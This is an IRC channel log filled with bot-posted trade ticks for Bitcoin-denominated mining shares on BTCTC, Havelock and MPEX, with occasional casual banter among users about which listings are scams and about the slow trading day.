0.0293 BTC [+] Aug 20 21:52:04 [BTCTC] [DMS.MINING] 6 @ 0.0032 = 0.0192 BTC [-] Aug 20 21:52:06 [BTCTC] [DMS.MINING] 1 @ 0.0032 BTC [-] Aug 20 21:52:07 [BTCTC] [DMS.MINING] 4 @ 0.00319 = 0.0128 BTC [-] Aug 20 21:52:49 [BTCTC] [DMS.MINING] 13 @ 0.00319 = 0.0415 BTC [-] Aug 20 21:54:01 czech republic defeats michigan! Aug 20 21:57:24 [BTCTC] [TAT.ASICMINER] 8 @ 0.03576 = 0.2861 BTC [+] Aug 20 21:58:39 [BTCTC] [BASIC-MINING] 5 @ 0.3037 = 1.5185 BTC [+] Aug 20 21:59:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.03576 = 0.0715 BTC [+] Aug 20 21:59:52 [BTCTC] [BASIC-MINING] 1 @ 0.3038 BTC [+] Aug 20 22:01:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.03575 = 0.0715 BTC [-] Aug 20 22:01:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.03576 = 0.2146 BTC [+] Aug 20 22:02:49 [BTCTC] [DMS.SELLING] 25 @ 0.0179 = 0.4475 BTC [-] Aug 20 22:04:46 [BTCTC] [ACTIVEMINING] 1 @ 0.005213 BTC [+] Aug 20 22:06:05 [HAVELOCK] [XBOND] 16 @ 0.001075 = 0.0172 BTC [+] Aug 20 22:06:11 [BTCTC] [ACTIVEMINING] 1 @ 0.005213 BTC [+] Aug 20 22:06:36 [BTCTC] [ACTIVEMINING] 16 @ 0.005214 = 0.0834 BTC [+] Aug 20 22:10:56 [BTCTC] [ACTIVEMINING] 30 @ 0.005323 = 0.1597 BTC [+] Aug 20 22:10:57 [BTCTC] [LABCOIN] 17 @ 0.00237 = 0.0403 BTC [+] Aug 20 22:11:03 [BTCTC] [ACTIVEMINING] 68 @ 0.005324 = 0.362 BTC [+] Aug 20 22:11:12 [BTCTC] [ACTIVEMINING] 19 @ 0.005326 = 0.1012 BTC [+] Aug 20 22:11:27 [BTCTC] [ACTIVEMINING] 30 @ 0.005326 = 0.1598 BTC [+] Aug 20 22:11:35 [BTCTC] [ACTIVEMINING] 50 @ 0.005326 = 0.2663 BTC [+] Aug 20 22:11:38 [BTCTC] [ACTIVEMINING] 68 @ 0.005326 = 0.3622 BTC [+] Aug 20 22:11:40 [MPEX] [S.MPOE] 5767 @ 0.00082288 = 4.7455 BTC [-] Aug 20 22:11:41 [MPEX] [S.MPOE] 6952 @ 0.00082203 = 5.7148 BTC [-] Aug 20 22:12:10 [BTCTC] [ACTIVEMINING] 250 @ 0.005326 = 1.3315 BTC [+] Aug 20 22:12:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.03574 BTC [-] Aug 20 22:12:40 [BTCTC] [ACTIVEMINING] 13 @ 0.00534 = 0.0694 BTC [+] Aug 20 22:13:05 [BTCTC] [DMS.PURCHASE] 10 @ 0.0206 = 0.206 BTC [-] Aug 20 22:13:50 [BTCTC] [DMS.PURCHASE] 54 @ 0.02061 = 1.1129 BTC [+] Aug 20 22:14:24 [BTCTC] [ASICMINER-PT] 1 @ 3.664 BTC [+] Aug 20 22:14:26 [BTCTC] [ASICMINER-PT] 2 @ 3.665 = 7.33 BTC [+] Aug 20 22:18:59 [BTCTC] [DMS.MINING] 5 @ 0.00332 = 0.0166 BTC [+] Aug 20 22:20:39 [BTCTC] [LABCOIN] 30 @ 0.002366 = 0.071 BTC [-] Aug 20 22:21:06 [BTCTC] [LABCOIN] 20 @ 0.002367 = 0.0473 BTC [+] Aug 20 22:21:49 [BTCTC] [LABCOIN] 55 @ 0.002395 = 0.1317 BTC [+] Aug 20 22:22:15 [BTCTC] [LABCOIN] 194 @ 0.002396 = 0.4648 BTC [+] Aug 20 22:22:50 [BTCTC] [LABCOIN] 600 @ 0.00243 = 1.458 BTC [+] Aug 20 22:23:53 [BTCTC] [LABCOIN] 925 @ 0.00243 = 2.2478 BTC [+] Aug 20 22:24:25 [BTCTC] [LABCOIN] 174 @ 0.002449 = 0.4261 BTC [+] Aug 20 22:25:21 [BTCTC] [LABCOIN] 17 @ 0.002448 = 0.0416 BTC [-] Aug 20 22:26:21 [BTCTC] [LABCOIN] 900 @ 0.00245 = 2.205 BTC [+] Aug 20 22:26:31 ;;nethash Aug 20 22:26:32 479715.090589 Aug 20 22:26:37 .d Aug 20 22:26:38 50810339.04828 | Next Diff in 769 blocks | Estimated Change: 22.8021% in 4d 2h 53m 28s Aug 20 22:28:50 [HAVELOCK] [XBOND] 16 @ 0.00107 = 0.0171 BTC [-] Aug 20 22:29:41 [HAVELOCK] [AM100] 1 @ 0.0358 BTC [+] Aug 20 22:33:10 [BTCTC] [BTC-BOND] 10 @ 0.009995 = 0.1 BTC [-] Aug 20 22:33:12 [BTCTC] [BTC-BOND] 94 @ 0.009996 = 0.9396 BTC [+] Aug 20 22:33:13 [BTCTC] [BTC-BOND] 10 @ 0.009998 = 0.1 BTC [+] Aug 20 22:33:14 [BTCTC] [BTC-BOND] 41 @ 0.009999 = 0.41 BTC [+] Aug 20 22:34:59 [BTCTC] [DMS.SELLING] 2 @ 0.0179 = 0.0358 BTC [-] Aug 20 22:35:45 [BTCTC] [DMS.MINING] 2 @ 0.0033 = 0.0066 BTC [-] Aug 20 22:40:25 [BTCTC] [DMS.SELLING] 10 @ 0.0179 = 0.179 BTC [-] Aug 20 22:40:47 [BTCTC] [LABCOIN] 85 @ 0.002407 = 0.2046 BTC [-] Aug 20 22:40:49 [BTCTC] [LABCOIN] 30 @ 0.002406 = 0.0722 BTC [-] Aug 20 22:40:49 [BTCTC] [LABCOIN] 20 @ 0.002405 = 0.0481 BTC [-] Aug 20 22:41:05 [BTCTC] [LABCOIN] 4100 @ 0.0024 = 9.84 BTC [-] Aug 20 22:43:05 [BTCTC] [DMS.SELLING] 1 @ 0.0179 BTC [-] Aug 20 22:43:22 [BTCTC] [LABCOIN] 30 @ 0.002399 = 0.072 BTC [-] Aug 20 22:45:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.03569 = 0.0714 BTC [-] Aug 20 22:45:11 [BTCTC] [TAT.ASICMINER] 26 @ 0.0357 = 0.9282 BTC [+] Aug 20 22:47:24 [BTCTC] [ASICMINER-PT] 1 @ 3.652 BTC [-] Aug 20 22:47:56 [BTCTC] [DMS.MINING] 13 @ 0.00319 = 0.0415 BTC [-] Aug 20 22:47:57 [BTCTC] [DMS.MINING] 72 @ 0.00319 = 0.2297 BTC [-] Aug 20 22:48:53 [BTCTC] [DMS.MINING] 60 @ 0.003189 = 0.1913 BTC [-] Aug 20 22:48:54 [BTCTC] [DMS.MINING] 119 @ 0.003188 = 0.3794 BTC [-] Aug 20 22:49:56 [BTCTC] [LABCOIN] 20 @ 0.002398 = 0.048 BTC [-] Aug 20 22:51:11 [BTCTC] [LABCOIN] 85 @ 0.002399 = 0.2039 BTC [+] Aug 20 22:51:12 [BTCTC] [LABCOIN] 15 @ 0.0024 = 0.036 BTC [+] Aug 20 22:52:35 [BTCTC] [LABCOIN] 57 @ 0.0024 = 0.1368 BTC [+] Aug 20 22:57:45 [BTCTC] [ASICMINER-PT] 1 @ 3.652 BTC [-] Aug 20 22:58:19 [BTCTC] [LABCOIN] 25 @ 0.0024 = 0.06 BTC [+] Aug 20 22:58:43 [BTCTC] [ACTIVEMINING] 30 @ 0.005222 = 0.1567 BTC [-] Aug 20 22:59:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005224 = 0.1567 BTC [+] Aug 20 22:59:42 [BTCTC] [ACTIVEMINING] 15 @ 0.005224 = 0.0784 BTC [+] Aug 20 22:59:55 [BTCTC] [ASICMINER-PT] 1 @ 3.65 BTC [-] Aug 20 23:01:27 [BTCTC] [ACTIVEMINING] 68 @ 0.005204 = 0.3539 BTC [-] Aug 20 23:01:31 [BTCTC] [ACTIVEMINING] 187 @ 0.0052 = 0.9724 BTC [-] Aug 20 23:01:40 [BTCTC] [LABCOIN] 15 @ 0.002366 = 0.0355 BTC [-] Aug 20 23:01:42 [BTCTC] [LABCOIN] 85 @ 0.002365 = 0.201 BTC [-] Aug 20 23:01:43 [BTCTC] [LABCOIN] 20 @ 0.002361 = 0.0472 BTC [-] Aug 20 23:01:45 [BTCTC] [LABCOIN] 4 @ 0.002355 = 0.0094 BTC [-] Aug 20 23:01:50 [BTCTC] [LABCOIN] 544 @ 0.00235 = 1.2784 BTC [-] Aug 20 23:02:54 [BTCTC] [LABCOIN] 15 @ 0.002449 = 0.0367 BTC [+] Aug 20 23:02:55 [BTCTC] [ASICMINER-PT] 1 @ 3.65 BTC [-] Aug 20 23:02:59 [BTCTC] [LABCOIN] 705 @ 0.00245 = 1.7273 BTC [+] Aug 20 23:08:41 [BTCTC] [DMS.MINING] 6 @ 0.0033 = 0.0198 BTC [+] Aug 20 23:14:43 http://principiadiscordia.com/book/45.php Aug 20 23:17:18 [BTCTC] [DMS.MINING] 1 @ 0.0033 BTC [+] Aug 20 23:17:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.03586 BTC [+] Aug 20 23:22:27 [BTCTC] [DMS.PURCHASE] 1 @ 0.02061 BTC [+] Aug 20 23:22:41 [BTCTC] [ASICMINER-PT] 2 @ 3.61 = 7.22 BTC [-] Aug 20 23:23:14 .d Aug 20 23:23:15 50810339.04828 | Next Diff in 762 blocks | Estimated Change: 22.8292% in 4d 1h 55m 29s Aug 20 23:34:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.03584 = 0.3584 BTC [-] Aug 20 23:34:39 [BTCTC] [TAT.ASICMINER] 14 @ 0.03584 = 0.5018 BTC [-] Aug 20 23:34:41 [BTCTC] [DMS.MINING] 10 @ 0.0033 = 0.033 BTC [+] Aug 20 23:35:34 [BTCTC] [LABCOIN] 20 @ 0.00244 = 0.0488 BTC [-] Aug 20 23:35:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.03584 = 0.1434 BTC [-] Aug 20 23:36:08 [BTCTC] [ACTIVEMINING] 20 @ 0.005281 = 0.1056 BTC [+] Aug 20 23:38:06 [BTCTC] [ACTIVEMINING] 5 @ 0.005281 = 0.0264 BTC [+] Aug 20 23:41:19 [BTCTC] [ASICMINER-PT] 2 @ 3.61 = 7.22 BTC [-] Aug 20 23:41:20 [BTCTC] [ASICMINER-PT] 1 @ 3.58 BTC [-] Aug 20 23:41:22 [BTCTC] [ASICMINER-PT] 5 @ 3.571 = 17.855 BTC [-] Aug 20 23:41:23 [BTCTC] [ASICMINER-PT] 32 @ 3.57 = 114.24 BTC [-] Aug 20 23:41:26 [HAVELOCK] [XBOND] 1 @ 0.001075 BTC [+] Aug 20 23:48:45 [BTCTC] [DMS.MINING] 2 @ 0.003299 = 0.0066 BTC [-] Aug 20 23:49:21 [BTCTC] [COGNITIVE] 1 @ 0.3272 BTC [-] Aug 20 23:50:35 [HAVELOCK] [AM100] 1 @ 0.03588 BTC [+] Aug 20 23:53:39 [BTCTC] [LABCOIN] 2000 @ 0.002448 = 4.896 BTC [+] Aug 20 23:57:27 slooow day.. Aug 20 23:58:57 Tell me about it Aug 21 00:01:42 [BTCTC] [LABCOIN] 6957 @ 0.002448 = 17.0307 BTC [+] Aug 21 00:01:43 [BTCTC] [LABCOIN] 3043 @ 0.00245 = 7.4554 BTC [+] Aug 21 00:03:43 [BTCTC] [LABCOIN] 352 @ 0.00245 = 0.8624 BTC [+] Aug 21 00:03:45 [BTCTC] [LABCOIN] 1178 @ 0.00245 = 2.8861 BTC [+] Aug 21 00:03:46 [BTCTC] [LABCOIN] 1500 @ 0.002452 = 3.678 BTC [+] Aug 21 00:05:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.03579 BTC [-] Aug 21 00:05:42 [BTCTC] [LABCOIN] 13 @ 0.002453 = 0.0319 BTC [+] Aug 21 00:05:44 [BTCTC] [ACTIVEMINING] 1000 @ 0.00525 = 5.25 BTC [-] Aug 21 00:05:51 gecko_x8: don't you have a rap album to record or something? Aug 21 00:05:56 [BTCTC] [LABCOIN] 6500 @ 0.002453 = 15.9445 BTC [+] Aug 21 00:06:32 [MPEX] [S.MPOE] 10450 @ 0.00082516 = 8.6229 BTC [+] Aug 21 00:06:34 [MPEX] [S.MPOE] 4287 @ 0.00082389 = 3.532 BTC [-] Aug 21 00:06:37 [BTCTC] [DMS.MINING] 12 @ 0.003299 = 0.0396 BTC [-] Aug 21 00:06:39 [MPEX] [S.MPOE] 4198 @ 0.00082203 = 3.4509 BTC [-] Aug 21 00:08:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.03534 = 0.1767 BTC [-] Aug 21 00:08:01 [BTCTC] [TAT.ASICMINER] 7 @ 0.03534 = 0.2474 BTC [-] Aug 21 00:08:43 [BTCTC] [ACTIVEMINING] 30 @ 0.005276 = 0.1583 BTC [+] Aug 21 00:10:49 [BTCTC] [ACTIVEMINING] 2 @ 0.005268 = 0.0105 BTC [-] Aug 21 00:11:15 say whut Aug 21 00:11:33 looks to me like labcoin wants to break higher Aug 21 00:14:14 [BTCTC] [LABCOIN] 84 @ 0.002453 = 0.2061 BTC [+] Aug 21 00:15:36 [BTCTC] [ACTIVEMINING] 30 @ 0.005274 = 0.1582 BTC [+] Aug 21 00:16:03 [BTCTC] [ACTIVEMINING] 20 @ 0.005274 = 0.1055 BTC [+] Aug 21 00:16:04 labcoin is a confirmed scam Aug 21 00:16:11 SO IS ACTIVEMINING FOR THAT MATTER Aug 21 00:16:18 lol Aug 21 00:16:45 confirmed? Aug 21 00:17:47 [BTCTC] [LABCOIN] 225 @ 0.002453 = 0.5519 BTC [+] Aug 21 00:19:00 go on Aug 21 00:19:15 jesus was a scam but his book has been a bestseller for 2000 years Aug 21 00:19:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.03577 BTC [+] Aug 21 00:19:29 He was the first Ken Aug 21 00:19:38 lolol Aug 21 00:21:45 [BTCTC] [ACTIVEMINING] 27 @ 0.005274 = 0.1424 BTC [+] Aug 21 00:22:54 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.001491 = 0.4473 BTC [-] Aug 21 00:22:58 [MPEX] [S.MPOE] 7300 @ 0.00082203 = 6.0008 BTC [-] Aug 21 00:25:54 ThickAsThieves is a scam Aug 21 00:26:01 ThickAsThieves is not even a real thief Aug 21 00:26:04 how can you trust him? Aug 21 00:26:18 i'm a scam too Aug 21 00:31:34 [BTCTC] [LABCOIN] 2178 @ 0.002453 = 5.3426 BTC [+] Aug 21 00:31:36 [BTCTC] [LABCOIN] 1822 @ 0.002454 = 4.4712 BTC [+] Aug 21 00:32:05 [BTCTC] [ACTIVEMINING] 30 @ 0.005274 = 0.1582 BTC [+] Aug 21 00:32:47 [BTCTC] [ASICMINER-PT] 1 @ 3.533 BTC [-] Aug 21 00:32:47 [BTCTC] [ASICMINER-PT] 1 @ 3.532 BTC [-] Aug 21 00:32:49 [BTCTC] [ASICMINER-PT] 1 @ 3.527 BTC [-] Aug 21 00:32:50 [BTCTC] [ASICMINER-PT] 1 @ 3.526 BTC [-] Aug 21 00:32:51 [BTCTC] [ASICMINER-PT] 2 @ 3.524 = 7.048 BTC [-] Aug 21 00:32:52 [BTCTC] [ASICMINER-PT] 1 @ 3.521 BTC [-] Aug 21 00:32:53 [BTCTC] [ASICMINER-PT] 5 @ 3.52 = 17.6 BTC [-] Aug 21 00:32:54 [BTCTC] [ASICMINER-PT] 5 @ 3.52 = 17.6 BTC [-] Aug 21 00:32:56 [BTCTC] [ASICMINER-PT] 3 @ 3.51 = 10.53 BTC [-] Aug 21 00:32:57 [BTCTC] [ASICMINER-PT] 1 @ 3.509 BTC [-] Aug 21 00:32:58 [BTCTC] [ASICMINER-PT] 2 @ 3.505 = 7.01 BTC [-] Aug 21 00:32:59 [BTCTC] [ASICMINER-PT] 4 @ 3.5 = 14 BTC [-] Aug 21 00:33:00 [BTCTC] [ASICMINER-PT] 2 @ 3.5 = 7 BTC [-] Aug 21 00:33:00 [BTCTC] [ASICMINER-PT] 1 @ 3.5 BTC [-] Aug 21 00:33:01 [BTCTC] [ASICMINER-PT] 3 @ 3.473 = 10.419 BTC [-] Aug 21 00:33:02 [BTCTC] [ASICMINER-PT] 1 @ 3.472 BTC [-] Aug 21 00:33:03 [BTCTC] [ASICMINER-PT] 2 @ 3.471 = 6.942 BTC [-] Aug 21 00:33:04 [BTCTC] [ASICMINER-PT] 4 @ 3.47 = 13.88 BTC [-] Aug 21 00:33:06 [BTCTC] [ASICMINER-PT] 1 @ 3.468 BTC [-] Aug 21 00:33:07 [BTCTC] [ASICMINER-PT] 2 @ 3.463 = 6.926 BTC [-] Aug 21 00:33:09 [BTCTC] [ASICMINER-PT] 12 @ 3.462 = 41.544 BTC [-] Aug 21 00:33:54 AM will be a nive buy @ 1.8 Aug 21 00:33:58 nice Aug 21 00:34:43 [BTCTC] [DMS.MINING] 12 @ 0.003209 = 0.0385 BTC [-] Aug 21 00:34:45 [BTCTC] [DMS.MINING] 8 @ 0.003205 = 0.0256 BTC [-] Aug 21 00:34:45 [BTCTC] [DMS.MINING] 6 @ 0.003201 = 0.0192 BTC [-] Aug 21 00:34:46 [BTCTC] [DMS.MINING] 24 @ 0.0032 = 0.0768 BTC [-] Aug 21 00:36:37 [BTCTC] [HOSTED-MINING] 1 @ 0.2798 BTC [+] Aug 21 00:36:38 [BTCTC] [HOSTED-MINING] 56 @ 0.2798 = 15.6688 BTC [+] Aug 21 00:36:39 [BTCTC] [HOSTED-MINING] 8 @ 0.2799 = 2.2392 BTC [+] Aug 21 00:36:40 [BTCTC] [HOSTED-MINING] 235 @ 0.28 = 65.8 BTC [+] Aug 21 00:37:40 BUY DMS.MINING Aug 21 00:37:42 [BTCTC] [LABCOIN] 120 @ 0.00244 = 0.2928 BTC [-] Aug 21 00:37:44 BUY BUY BUY Aug 21 00:38:07 [BTCTC] [LABCOIN] 20 @ 0.002409 = 0.0482 BTC [-] Aug 21 00:38:54 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 21 00:39:30 DMS is a scam Aug 21 00:39:40 [BTCTC] [LABCOIN] 30 @ 0.002424 = 0.0727 BTC [+] Aug 21 00:39:53 [BTCTC] [ACTIVEMINING] 1000 @ 0.005275 = 5.275 BTC [+] Aug 21 00:40:37 [MPEX] [S.MPOE] 853 @ 0.00082203 = 0.7012 BTC [-] Aug 21 00:40:39 [MPEX] [S.MPOE] 2388 @ 0.00082583 = 1.9721 BTC [+] Aug 21 00:41:03 [HAVELOCK] [AM100] 1 @ 0.0358 BTC [-] Aug 21 00:41:24 dub really? Aug 21 00:41:30 how is DMS a scam? Aug 21 00:41:37 tell me like I'm 5 Aug 21 00:41:47 dub wub dub wub dub dub step Aug 21 00:41:52 [HAVELOCK] [AM100] 85 @ 0.0355 = 3.0175 BTC [-] Aug 21 00:41:56 [HAVELOCK] [AM100] 85 @ 0.03542 = 3.0107 BTC [-] Aug 21 00:42:19 anyone here using bitmessage Aug 21 00:42:44 [BTCTC] [ACTIVEMINING] 970 @ 0.005274 = 5.1158 BTC [-] Aug 21 00:43:59 [MPEX] [S.MPOE] 4850 @ 0.00083013 = 4.0261 BTC [+] Aug 21 00:44:42 [BTCTC] [LABCOIN] 30 @ 0.002419 = 0.0726 BTC [-] Aug 21 00:44:43 [BTCTC] [LABCOIN] 85 @ 0.00242 = 0.2057 BTC [+] Aug 21 00:45:46 [BTCTC] [LABCOIN] 85 @ 0.002361 = 0.2007 BTC [-] Aug 21 00:45:53 [BTCTC] [LABCOIN] 175 @ 0.002359 = 0.4128 BTC [-] Aug 21 00:45:57 [BTCTC] [LABCOIN] 65 @ 0.002358 = 0.1533 BTC [-] Aug 21 00:46:03 [BTCTC] [LABCOIN] 556 @ 0.002356 = 1.3099 BTC [-] Aug 21 00:46:04 [BTCTC] [COGNITIVE] 1 @ 0.3272 BTC [-] Aug 21 00:46:10 [BTCTC] [ASICMINER-PT] 1 @ 3.582 BTC [+] Aug 21 00:46:15 [BTCTC] [LABCOIN] 1000 @ 0.002353 = 2.353 BTC [-] Aug 21 00:46:18 [BTCTC] [LABCOIN] 119 @ 0.00235 = 0.2797 BTC [-] Aug 21 00:46:23 [BTCTC] [LABCOIN] 5 @ 0.002423 = 0.0121 BTC [+] Aug 21 00:46:44 [BTCTC] [ASICMINER-PT] 2 @ 3.465 = 6.93 BTC [-] Aug 21 00:48:51 kakobrakla, I read about it and I think I will try it out Aug 21 00:49:52 kakobrakla, it would help if I could spell Kakobrekla Aug 21 00:50:13 Hollywood press 'k' and 'tab' Aug 21 00:50:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.03572 = 0.1786 BTC [-] Aug 21 00:50:32 [BTCTC] [DMS.MINING] 66 @ 0.003299 = 0.2177 BTC [+] Aug 21 00:50:33 [BTCTC] [DMS.MINING] 131 @ 0.0033 = 0.4323 BTC [+] Aug 21 00:50:33 [BTCTC] [DMS.MINING] 25 @ 0.0033 = 0.0825 BTC [+] Aug 21 00:50:35 [BTCTC] [DMS.MINING] 153 @ 0.00332 = 0.508 BTC [+] Aug 21 00:50:39 lol Aug 21 00:51:28 [BTCTC] [BASIC-MINING] 2 @ 0.3038 = 0.6076 BTC [+] Aug 21 00:51:33 hmm, thanks Aug 21 00:52:02 [BTCTC] [BASIC-MINING] 2 @ 0.3038 = 0.6076 BTC [+] Aug 21 00:52:31 [BTCTC] [LABCOIN] 40 @ 0.002423 = 0.0969 BTC [+] Aug 21 00:53:08 [BTCTC] [LABCOIN] 30 @ 0.002424 = 0.0727 BTC [+] Aug 21 00:53:42 [BTCTC] [LABCOIN] 45 @ 0.002424 = 0.1091 BTC [+] Aug 21 00:55:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.03571 = 0.0714 BTC [-] Aug 21 00:55:36 KRS1: Aug 21 00:55:38 kleeck: Aug 21 00:55:44 kakobrekla: Aug 21 00:55:45 there we go Aug 21 00:56:08 [HAVELOCK] [AM100] 1 @ 0.03579 BTC [+] Aug 21 00:56:51 [HAVELOCK] [AM100] 4 @ 0.03579999 = 0.1432 BTC [+] Aug 21 00:59:08 [BTCTC] [ASICMINER-PT] 1 @ 3.471 BTC [+] Aug 21 00:59:10 [BTCTC] [ASICMINER-PT] 1 @ 3.47 BTC [-] Aug 21 00:59:11 [BTCTC] [ASICMINER-PT] 1 @ 3.47 BTC [-] Aug 21 00:59:11 [BTCTC] [ASICMINER-PT] 4 @ 3.464 = 13.856 BTC [-] Aug 21 00:59:13 [BTCTC] [ASICMINER-PT] 3 @ 3.462 = 10.386 BTC [-] Aug 21 00:59:14 [BTCTC] [ASICMINER-PT] 10 @ 3.462 = 34.62 BTC [-] Aug 21 00:59:15 [BTCTC] [ASICMINER-PT] 10 @ 3.46 = 34.6 BTC [-] Aug 21 00:59:26 [BTCTC] [BTC-GROWTH] 24 @ 0.09979 = 2.395 BTC [+] Aug 21 00:59:29 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [+] Aug 21 01:00:20 [BTCTC] [ACTIVEMINING] 30 @ 0.005203 = 0.1561 BTC [-] Aug 21 01:00:21 [BTCTC] [ACTIVEMINING] 42 @ 0.005202 = 0.2185 BTC [-] Aug 21 01:00:23 [BTCTC] [ACTIVEMINING] 347 @ 0.005201 = 1.8047 BTC [-] Aug 21 01:00:24 [BTCTC] [ACTIVEMINING] 268 @ 0.0052 = 1.3936 BTC [-] Aug 21 01:00:25 [BTCTC] [ACTIVEMINING] 800 @ 0.005181 = 4.1448 BTC [-] Aug 21 01:00:26 [BTCTC] [ACTIVEMINING] 1000 @ 0.00518 = 5.18 BTC [-] Aug 21 01:01:21 [BTCTC] [TAT.ASICMINER] 14 @ 0.03536 = 0.495 BTC [-] Aug 21 01:01:23 [BTCTC] [TAT.ASICMINER] 12 @ 0.03535 = 0.4242 BTC [-] Aug 21 01:01:24 [BTCTC] [TAT.ASICMINER] 14 @ 0.03535 = 0.4949 BTC [-] Aug 21 01:01:25 [BTCTC] [TAT.ASICMINER] 16 @ 0.0353 = 0.5648 BTC [-] Aug 21 01:01:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0353 BTC [-] Aug 21 01:01:28 [BTCTC] [TAT.ASICMINER] 27 @ 0.0353 = 0.9531 BTC [-] Aug 21 01:01:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.03501 = 0.07 BTC [-] Aug 21 01:01:30 [BTCTC] [TAT.ASICMINER] 16 @ 0.03474 = 0.5558 BTC [-] Aug 21 01:01:30 [BTCTC] [TAT.ASICMINER] 100 @ 0.03473 = 3.473 BTC [-] Aug 21 01:01:31 [BTCTC] [TAT.ASICMINER] 16 @ 0.03473 = 0.5557 BTC [-] Aug 21 01:01:32 [BTCTC] [TAT.ASICMINER] 40 @ 0.03472 = 1.3888 BTC [-] Aug 21 01:01:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.03471 = 0.1736 BTC [-] Aug 21 01:01:35 [BTCTC] [TAT.ASICMINER] 30 @ 0.0347 = 1.041 BTC [-] Aug 21 01:01:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.0347 = 0.2082 BTC [-] Aug 21 01:01:37 [MPEX] [S.MPOE] 2847 @ 0.00083013 = 2.3634 BTC [+] Aug 21 01:01:38 [MPEX] [S.MPOE] 5853 @ 0.00083172 = 4.8681 BTC [+] Aug 21 01:01:54 [BTCTC] [BTC-GROWTH] 9 @ 0.1002 = 0.9018 BTC [+] Aug 21 01:05:32 [BTCTC] [LABCOIN] 80 @ 0.002429 = 0.1943 BTC [+] Aug 21 01:05:33 [BTCTC] [LABCOIN] 1500 @ 0.00243 = 3.645 BTC [+] Aug 21 01:05:34 [BTCTC] [LABCOIN] 65 @ 0.002435 = 0.1583 BTC [+] Aug 21 01:05:35 [BTCTC] [LABCOIN] 1000 @ 0.002438 = 2.438 BTC [+] Aug 21 01:05:36 [BTCTC] [LABCOIN] 100 @ 0.002439 = 0.2439 BTC [+] Aug 21 01:05:37 [BTCTC] [LABCOIN] 12255 @ 0.002454 = 30.0738 BTC [+] Aug 21 01:05:47 [BTCTC] [DMS.MINING] 1 @ 0.00332 BTC [+] Aug 21 01:05:48 [BTCTC] [DMS.MINING] 1 @ 0.00332 BTC [+] Aug 21 01:06:22 [BTCTC] [LABCOIN] 60 @ 0.002439 = 0.1463 BTC [-] Aug 21 01:06:34 [BTCTC] [LABCOIN] 900 @ 0.002439 = 2.1951 BTC [-] Aug 21 01:06:35 [BTCTC] [ASICMINER-PT] 1 @ 3.521 BTC [+] Aug 21 01:06:51 ;;calc 100.69/.75 Aug 21 01:06:51 134.253333333 Aug 21 01:07:13 ;;calc (100.69/.75) / 1.60 Aug 21 01:07:13 83.9083333333 Aug 21 01:07:35 [BTCTC] [LABCOIN] 60 @ 0.002449 = 0.1469 BTC [+] Aug 21 01:07:37 [BTCTC] [LABCOIN] 40 @ 0.00245 = 0.098 BTC [+] Aug 21 01:07:37 [BTCTC] [LABCOIN] 250 @ 0.002454 = 0.6135 BTC [+] Aug 21 01:07:48 [BTCTC] [ACTIVEMINING] 68 @ 0.005187 = 0.3527 BTC [+] Aug 21 01:07:50 [BTCTC] [ACTIVEMINING] 40 @ 0.005185 = 0.2074 BTC [-] Aug 21 01:07:51 [BTCTC] [ACTIVEMINING] 173 @ 0.00518 = 0.8961 BTC [-] Aug 21 01:07:58 [BTCTC] [HOSTED-MINING] 3 @ 0.28 = 0.84 BTC [+] Aug 21 01:08:24 [BTCTC] [LABCOIN] 3 @ 0.002454 = 0.0074 BTC [+] Aug 21 01:08:25 [BTCTC] [ASICMINER-PT] 1 @ 3.49 BTC [-] Aug 21 01:09:16 [BTCTC] [ASICMINER-PT] 1 @ 3.519 BTC [+] Aug 21 01:09:32 [BTCTC] [LABCOIN] 630 @ 0.002454 = 1.546 BTC [+] Aug 21 01:09:50 [BTCTC] [DMS.PURCHASE] 38 @ 0.02061 = 0.7832 BTC [+] Aug 21 01:10:23 [BTCTC] [ACTIVEMINING] 13 @ 0.005267 = 0.0685 BTC [+] Aug 21 01:11:34 [HAVELOCK] [LABCO] 152 @ 0.0023 = 0.3496 BTC [+] Aug 21 01:12:24 [BTCTC] [ASICMINER-PT] 1 @ 3.517 BTC [-] Aug 21 01:12:26 [BTCTC] [ASICMINER-PT] 1 @ 3.521 BTC [+] Aug 21 01:14:39 [MPEX] [S.MPOE] 16850 @ 0.00082874 = 13.9643 BTC [-] Aug 21 01:15:15 [HAVELOCK] [SMG] 13 @ 0.00020001 = 0.0026 BTC [-] Aug 21 01:15:19 [HAVELOCK] [SMG] 200 @ 0.0002 = 0.04 BTC [-] Aug 21 01:15:23 [HAVELOCK] [SMG] 787 @ 0.00019 = 0.1495 BTC [-] Aug 21 01:18:45 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.001485 = 0.0074 BTC [-] Aug 21 01:19:13 [BTCTC] [TAT.ASICMINER] 67 @ 0.03591 = 2.406 BTC [+] Aug 21 01:20:13 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.001485 = 0.0104 BTC [-] Aug 21 01:20:54 [BTCTC] [ACTIVEMINING] 4 @ 0.005266 = 0.0211 BTC [-] Aug 21 01:25:13 [BTCTC] [RSM] 25 @ 0.01 = 0.25 BTC [+] Aug 21 01:25:15 [BTCTC] [RSM] 16 @ 0.00971 = 0.1554 BTC [-] Aug 21 01:25:15 [BTCTC] [RSM] 168 @ 0.0097 = 1.6296 BTC [-] Aug 21 01:27:18 [BTCTC] [ACTIVEMINING] 30 @ 0.005201 = 0.156 BTC [-] Aug 21 01:27:20 [BTCTC] [ACTIVEMINING] 563 @ 0.0052 = 2.9276 BTC [-] Aug 21 01:27:21 [BTCTC] [ACTIVEMINING] 30 @ 0.005184 = 0.1555 BTC [-] Aug 21 